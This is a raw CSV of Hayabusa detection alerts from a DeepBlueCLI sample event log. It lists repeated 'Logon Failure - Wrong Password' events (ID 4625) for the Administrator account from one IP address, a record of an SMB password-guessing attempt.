im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aOyLWd5CAAjnJt3C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.240 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s7gI55uWlshCLw3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l7UogJ8bBw6Epbht | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIl0QRFHXCVAHWdV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.370 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OxPv9v4TxFvS9JMy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.417 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: uHMGfCorrLXpDyeD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KQTKgFibIa8NWExO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.492 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEnx3upH3Om0wHn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KlNbW1ljPSTdgUKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w2WMd3HugfjSwJPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yEy0C6dMhysbNDrX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: vxlayd8pnAZ3dZ2Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.701 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PhKO1jyWqVEdC9w2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.736 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dAH2mHJ4ZK5GS2p0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lV2ZIWGGwlkyEMRB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.811 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sum2yMFio9KLwZk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fICXSRvv9Vm0uVpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.894 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: IgrOk6Fjp0QtfJ3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OPKoHLtxNoiG65sl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:33.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NctXRH1DR3slfVxQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vLnAs36K1mTivu2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7crZQ0eQ5RDNIp7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yHjgGhEtZgNwjaii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.148 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5gi2SS2mQiDylQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kqWJGguiWBEplJiZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWP4luPa3lFolQVI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5K9DQWbzslRZZMSC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.329 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qm0L113v24jlfjx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.360 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seuUjyGmNlyYT4tU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:34.400 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FljAF4LWLmWNa3kL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.447 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RnN5mBOaAvYu25G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llBt31S46QVzg0Ki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1rvJUZo91Kka0G1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Zqi86ZSFGRnoFM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GeyeVdCUmHEKxR8f | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.708 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DwxJVXt79KBZalqS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TDfRu1OTlHmyc38P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLCAMPDWti9hjHtV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.833 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k2eViuJeorX2peGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: davOE9p1fF2LbDP7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.922 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.997 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.040 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.169 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.234 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.433 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.517 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.562 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.101 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
